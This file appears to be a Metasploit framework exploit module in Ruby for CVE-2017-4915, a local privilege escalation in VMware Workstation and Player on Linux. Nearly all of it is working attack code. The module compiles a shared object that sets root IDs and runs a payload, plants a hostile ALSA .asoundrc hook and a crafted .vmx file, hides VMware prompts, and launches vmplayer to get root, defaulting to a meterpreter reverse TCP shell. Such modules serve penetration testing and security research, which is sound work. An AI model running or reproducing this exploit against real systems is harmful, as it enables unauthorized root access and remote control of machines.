metasploit-framework/modules/exploits/linux/local/vmware_alsa_config.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VMware Workstation ALSA Config File Local Privilege Escalation',
      'Description'    => %q{
        This module exploits a vulnerability in VMware Workstation Pro and
        Player on Linux which allows users to escalate their privileges by
        using an ALSA configuration file to load and execute a shared object
        as root when launching a virtual machine with an attached sound card.

        This module has been tested successfully on VMware Player version
        12.5.0 on Debian Linux.
      },
      'References'     =>
        [
          [ 'CVE', '2017-4915' ],
          [ 'EDB', '42045' ],
          [ 'BID', '98566' ],
          [ 'URL', 'https://gist.github.com/bcoles/cd26a831473088afafefc93641e184a9' ],
          [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2017-0009.html' ],
          [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1142' ]
        ],
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jann Horn', # Discovery and PoC
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'DisclosureDate' => 'May 22 2017',
      'Platform'       => 'linux',
      'Targets'        =>
        [
          [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
          [ 'Linux x64', { 'Arch' => ARCH_X64 } ]
        ],
      'DefaultOptions' =>
        {
          'Payload'     => 'linux/x64/meterpreter_reverse_tcp',
          'WfsDelay'    => 30,
          'PrependFork' => true
        },
      'DefaultTarget'  => 1,
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Privileged'     => true ))
    register_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  def has_prereqs?
    vmplayer = cmd_exec 'which vmplayer'
    if vmplayer.include? 'vmplayer'
      vprint_good 'vmplayer is installed'
    else
      print_error 'vmplayer is not installed. Exploitation will fail.'
      return false
    end

    gcc = cmd_exec 'which gcc'
    if gcc.include? 'gcc'
      vprint_good 'gcc is installed'
    else
      print_error 'gcc is not installed. Compiling will fail.'
      return false
    end

    true
  end

  def check
    unless has_prereqs?
      print_error 'Target missing prerequisites'
      return CheckCode::Safe
    end

    begin
      config = read_file '/etc/vmware/config'
    rescue
      config = ''
    end

    if config =~ /player\.product\.version\s*=\s*"([\d\.]+)"/
      @version = Gem::Version.new $1.gsub(/\.$/, '')
      vprint_status "VMware is version #{@version}"
    else
      print_error "Could not determine VMware version."
      return CheckCode::Unknown
    end

    if @version < Gem::Version.new('12.5.6')
      print_good 'Target version is vulnerable'
      return CheckCode::Vulnerable
    end

    print_error 'Target version is not vulnerable'
    CheckCode::Safe
  end

  def exploit
    if check == CheckCode::Safe
      print_error 'Target machine is not vulnerable'
      return
    end

    @home_dir = cmd_exec 'echo ${HOME}'
    unless @home_dir
      print_error "Could not find user's home directory"
      return
    end
    @prefs_file = "#{@home_dir}/.vmware/preferences"

    fname = ".#{rand_text_alphanumeric rand(10) + 5}"
    @base_dir = "#{datastore['WritableDir']}/#{fname}"
    cmd_exec "mkdir #{@base_dir}"

    so = %Q^
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1142
Original shared object code by jhorn
*/

#define _GNU_SOURCE
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/prctl.h>
#include <err.h>

extern char *program_invocation_short_name;

__attribute__((constructor)) void run(void) {
  uid_t ruid, euid, suid;
  if (getresuid(&ruid, &euid, &suid))
    err(1, "getresuid");
  if (ruid == 0 || euid == 0 || suid == 0) {
    if (setresuid(0, 0, 0) || setresgid(0, 0, 0))
      err(1, "setresxid");
    system("#{@base_dir}/#{fname}.elf");
    _exit(0);
  }
}
^
    vprint_status "Writing #{@base_dir}/#{fname}.c"
    write_file "#{@base_dir}/#{fname}.c", so

    vprint_status "Compiling #{@base_dir}/#{fname}.o"
    output = cmd_exec "gcc -fPIC -shared -o #{@base_dir}/#{fname}.so #{@base_dir}/#{fname}.c -Wall -ldl -std=gnu99"
    unless output == ''
      print_error "Compilation failed: #{output}"
      return
    end

    vmx = %Q|
.encoding = "UTF-8"
config.version = "8"
virtualHW.version = "8"
scsi0.present = "FALSE"
memsize = "4"
ide0:0.present = "FALSE"
sound.present = "TRUE"
sound.fileName = "-1"
sound.autodetect = "TRUE"
vmci0.present = "FALSE"
hpet0.present = "FALSE"
displayName = "#{fname}"
guestOS = "other"
nvram = "#{fname}.nvram"
virtualHW.productCompatibility = "hosted"
gui.exitOnCLIHLT = "FALSE"
powerType.powerOff = "soft"
powerType.powerOn = "soft"
powerType.suspend = "soft"
powerType.reset = "soft"
floppy0.present = "FALSE"
monitor_control.disable_longmode = 1
|
    vprint_status "Writing #{@base_dir}/#{fname}.vmx"
    write_file "#{@base_dir}/#{fname}.vmx", vmx

    vprint_status "Writing #{@base_dir}/#{fname}.elf"
    write_file "#{@base_dir}/#{fname}.elf", generate_payload_exe

    vprint_status "Setting #{@base_dir}/#{fname}.elf executable"
    cmd_exec "chmod +x #{@base_dir}/#{fname}.elf"

    asoundrc = %Q|
hook_func.pulse_load_if_running {
  lib "#{@base_dir}/#{fname}.so"
  func "conf_pulse_hook_load_if_running"
}
|
    vprint_status "Writing #{@home_dir}/.asoundrc"
    write_file "#{@home_dir}/.asoundrc", asoundrc

    vprint_status 'Disabling VMware hint popups'
    unless directory? "#{@home_dir}/.vmware"
      cmd_exec "mkdir #{@home_dir}/.vmware"
      @remove_prefs_dir = true
    end

    if file? @prefs_file
      begin
        prefs = read_file @prefs_file
      rescue
        prefs = ''
      end
    end

    if prefs.blank?
      prefs = ".encoding = \"UTF8\"\n"
      prefs << "pref.vmplayer.firstRunDismissedVersion = \"999\"\n"
      prefs << "hints.hideAll = \"TRUE\"\n"
      @remove_prefs_file = true
    elsif prefs =~ /hints\.hideAll/i
      prefs.gsub!(/hints\.hideAll.*$/i, 'hints.hideAll = "TRUE"')
    else
      prefs.sub!(/\n?\z/, "\nhints.hideAll = \"TRUE\"\n")
    end
    vprint_status "Writing #{@prefs_file}"
    write_file "#{@prefs_file}", prefs

    print_status 'Launching VMware Player...'
    cmd_exec "vmplayer #{@base_dir}/#{fname}.vmx"
  end

  def cleanup
    print_status "Removing #{@base_dir} directory"
    cmd_exec "rm '#{@base_dir}' -rf"

    print_status "Removing #{@home_dir}/.asoundrc"
    cmd_exec "rm '#{@home_dir}/.asoundrc'"

    if @remove_prefs_dir
      print_status "Removing #{@home_dir}/.vmware directory"
      cmd_exec "rm '#{@home_dir}/.vmware' -rf"
    elsif @remove_prefs_file
      print_status "Removing #{@prefs_file}"
      cmd_exec "rm '#{@prefs_file}' -rf"
    end
  end

  def on_new_session(session)
    # if we don't /bin/sh here, our payload times out
    session.shell_command_token '/bin/sh'
    super
  end
end